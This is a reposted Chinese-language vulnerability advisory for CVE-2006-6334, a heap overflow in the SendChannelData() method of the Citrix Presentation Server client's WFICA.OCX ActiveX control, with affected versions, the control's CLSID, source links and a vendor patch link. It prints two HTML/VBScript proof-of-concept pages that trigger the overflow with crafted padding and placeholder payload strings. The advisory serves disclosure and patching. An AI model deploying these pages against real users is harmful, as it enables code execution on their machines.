 |
Citrix Presentation Server客户端WFICA.OCX ActiveX组件堆溢出漏洞 |
|
|
| Citrix Presentation Server客户端WFICA.OCX ActiveX组件堆溢出漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:18:05 |
|
2006-12-7 16:43:05
发布日期:2006-12-06
更新日期:2006-12-07
受影响系统:Citrix Presentation Server Client for Windows < 9.230 不受影响系统:Citrix Presentation Server Client for Windows 9.230 描述:
BUGTRAQ ID: 21458
CVE(CAN) ID: CVE-2006-6334
Citrix Presentation Server允许用户通过网络远程访问应用程序。
Citrix Presentation Server的WFICA.OCX控件在处理畸形参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。
Citrix Presentation Server客户端的ICA Client ActiveX控件组件WFICA.OCX(CLSID 238F6F83-B8B4-11CF-8771-00A024541EE3)中的SendChannelData()方法存在堆溢出漏洞。该函数的原型如下:
SendChannelData(ChannelName As String,
Data As String,
DataSize As Long,
DataType As ICAVCDataType)
如果能够为DataSize参数指定过小的缓冲区长度而对Data参数传送超长字符串的话,就会触发这个溢出,导致执行任意指令。
<*来源:Andrew Christensen (anc@fortconsult.net)
链接:http://secunia.com/advisories/23246/
http://support.citrix.com/article/CTX111827&printable=true
http://marc.theaimsgroup.com/?l=full-disclosure&m=116545528600892&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <html>
<head> <title>Citrix ActiveX Caller</title> </head>
<body>
<OBJECT id="Security" width=500 height=500
classid="CLSID:238F6F83-B8B4-11CF-8771-
00A024541EE3">
<SPAN STYLE="color:red">Congrats. You aren't
vulnerable.</SPAN>
</OBJECT>
<script language=vbscript>
spamA = "whatever"
spamB =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9090EB04" + "70DE3400" +
"CCCCCCCC11111111"
msgbox "attach debugger"
Security.SendChannelData spamA,spamB,1,1
</script>
</body>
</html>
========================================================================
<html>
<head> <title>Citrix ActiveX Caller</title> </head>
<body>
<OBJECT id="Security" width=500 height=500
classid="CLSID:238F6F83-B8B4-11CF-8771-
00A024541EE3">
<SPAN STYLE="color:red">Congrats. You aren't
vulnerable.</SPAN>
</OBJECT>
<script language=vbscript>
spamA =
"PAYLOADPAYLOADPAYLOADPAYLOADPAYLOADPAYLOADPAYLOAD"
spamB = "AAAAAAAA" +
"CCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + "BBBBBBBB" +
"DDDDDDDD11111111" + String(160,"C")
msgbox "attach debugger"
Security.SendChannelData spamA,spamB,1,1
</script>
</body>
</html>
建议:
厂商补丁:
Citrix
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.citrix.com/English/SS/downloads/details.asp?dID=2755&downloadID=162299&pID=186
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: SAP Internet图形服务器多个远程安全漏洞
下一篇文章: Linux Kernel get_fdb_entries()缓冲区溢出漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
